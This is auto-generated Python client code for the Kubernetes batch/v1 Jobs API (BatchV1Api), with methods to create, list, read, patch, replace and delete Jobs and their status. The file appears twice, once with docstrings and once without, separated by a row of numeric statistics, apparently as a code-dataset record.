if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_job_status(self, name, namespace, body, **kwargs):
"""
partially update status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_job_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_job_status_with_http_info(self, name, namespace, body, **kwargs):
"""
partially update status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_job_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_job_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_job_status`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_job(self, name, namespace, **kwargs):
"""
read the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_job(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'.
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_namespaced_job_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_job_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_job_with_http_info(self, name, namespace, **kwargs):
"""
read the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_job_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'.
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty', 'exact', 'export']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'exact' in params:
query_params.append(('exact', params['exact']))
if 'export' in params:
query_params.append(('export', params['export']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_job_status(self, name, namespace, **kwargs):
"""
read status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_job_status(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_namespaced_job_status_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_job_status_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_job_status_with_http_info(self, name, namespace, **kwargs):
"""
read status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_job_status_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_job_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_job(self, name, namespace, body, **kwargs):
"""
replace the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_job(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_namespaced_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_job_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_job_with_http_info(self, name, namespace, body, **kwargs):
"""
replace the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_job_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_job`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_job_status(self, name, namespace, body, **kwargs):
"""
replace status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_job_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_job_status_with_http_info(self, name, namespace, body, **kwargs):
"""
replace status of the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_job_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Job body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_job_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_job_status`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 62.94069 | 1,390 | 0.645665 |
from __future__ import absolute_import
import sys
import os
import re
from six import iteritems
from ..api_client import ApiClient
class BatchV1Api(object):
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_namespaced_job(self, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_namespaced_job_with_http_info(namespace, body, **kwargs)
else:
(data) = self.create_namespaced_job_with_http_info(namespace, body, **kwargs)
return data
def create_namespaced_job_with_http_info(self, namespace, body, **kwargs):
all_params = ['namespace', 'body', 'include_uninitialized', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_job`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_job(self, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_collection_namespaced_job_with_http_info(namespace, **kwargs)
else:
(data) = self.delete_collection_namespaced_job_with_http_info(namespace, **kwargs)
return data
def delete_collection_namespaced_job_with_http_info(self, namespace, **kwargs):
all_params = ['namespace', 'include_uninitialized', 'pretty', '_continue', 'field_selector', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_job(self, name, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_namespaced_job_with_http_info(name, namespace, **kwargs)
else:
(data) = self.delete_namespaced_job_with_http_info(name, namespace, **kwargs)
return data
def delete_namespaced_job_with_http_info(self, name, namespace, **kwargs):
all_params = ['name', 'namespace', 'pretty', 'body', 'dry_run', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_job`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
if 'grace_period_seconds' in params:
query_params.append(('gracePeriodSeconds', params['grace_period_seconds']))
if 'orphan_dependents' in params:
query_params.append(('orphanDependents', params['orphan_dependents']))
if 'propagation_policy' in params:
query_params.append(('propagationPolicy', params['propagation_policy']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_api_resources(self, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_api_resources_with_http_info(**kwargs)
return data
def get_api_resources_with_http_info(self, **kwargs):
all_params = []
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1APIResourceList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_job_for_all_namespaces(self, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_job_for_all_namespaces_with_http_info(**kwargs)
else:
(data) = self.list_job_for_all_namespaces_with_http_info(**kwargs)
return data
def list_job_for_all_namespaces_with_http_info(self, **kwargs):
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_job_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1JobList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_namespaced_job(self, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_namespaced_job_with_http_info(namespace, **kwargs)
else:
(data) = self.list_namespaced_job_with_http_info(namespace, **kwargs)
return data
def list_namespaced_job_with_http_info(self, namespace, **kwargs):
all_params = ['namespace', 'include_uninitialized', 'pretty', '_continue', 'field_selector', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1JobList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_job(self, name, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_namespaced_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_job_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_job_with_http_info(self, name, namespace, body, **kwargs):
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
